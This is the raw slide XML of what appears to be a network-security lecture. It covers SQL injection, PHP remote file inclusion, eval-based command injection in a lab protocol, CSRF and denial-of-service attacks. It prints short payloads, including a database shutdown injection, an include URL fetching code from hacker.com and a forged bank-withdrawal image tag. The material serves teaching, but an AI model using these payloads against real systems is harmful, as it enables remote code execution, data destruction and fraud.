              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="arn-CL" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> CREATE TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> …</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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arn-CL" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>shutdown with nowait;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE name='Admin' AND password LIKE '%m%‘</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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Defining a DATABASE name:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%t%')</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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Defining table names:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE‘</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="arn-CL" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>select * from sys.tables</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="28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CA608505-89CB-48F2-B706-BDB956F13A58}"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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PHP injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214200" y="1500120"/>
            <a:ext cx="8472240" cy="4630320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>php-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  http://site.com?module=...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>lines:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$module = $_GET['module'];</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>include ($module.'.php');</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The hacker creates his own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>php-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>hack.php, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>uploads it to the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>hacker.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>types in the browser:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://site.com?module=http://hacker.com/hack</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9595DD72-F6C4-4386-89F9-D322BA4D1C96}"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357120" y="214200"/>
            <a:ext cx="7071840" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95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The concept of network security. Example</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1981080"/>
            <a:ext cx="7772039" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="95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Email Security</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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send private messages</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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be sure that the received message was sent by the sender</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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make sure that the text of the message didn't change on the way</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Other injections</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="441144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Examples of the CALC protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> from the lab #6 in ruby, python, nodejs, php are vulnerable due to a line in the code:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>eval(words[2]+words[1]+words[3])</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If you substitute commands instead of operations and arguments, they will be executed on the server:</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CALC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> )</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9F7F89F9-96AC-4005-8EFF-888C68AE710A}"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CSRF - Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1571759"/>
            <a:ext cx="9143640" cy="500040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Forcing any actions to be performed on a vulnerable site on behalf of the victim (changing the password, security question for password recovery, mail, adding an administrator, using passive XSS, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="749"/>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19" algn="l"/>
                <a:tab pos="5729400" algn="l"/>
                <a:tab pos="6178680" algn="l"/>
                <a:tab pos="6627960" algn="l"/>
                <a:tab pos="7077240" algn="l"/>
                <a:tab pos="7526160" algn="l"/>
                <a:tab pos="7975440" algn="l"/>
                <a:tab pos="8424720" algn="l"/>
                <a:tab pos="8874000" algn="l"/>
                <a:tab pos="9323280" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416051" indent="-416051">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> Hello, Alice! Look at that cute cat: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;img src="http://bank.com/withdraw?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> account=Alice&amp;amount=1000000&amp;for=Hacker"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs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18166D6C-36BD-4FA4-AB0D-4C72963BE76E}"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3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DoS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Denial of Service</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214200" y="1500120"/>
            <a:ext cx="8786520" cy="5143320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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1996 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>packets longer than 65 Kb (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ping of death)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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Avalanche attacks</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the target of the attack performs more actions than the attacking party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(insufficient counteraction to automation)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>distributed attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(Distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Denial of Service)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sending multiple requests (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>) to establish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>TCP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>connections</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Echo attack</a:t>
            </a:r>
            <a:r>
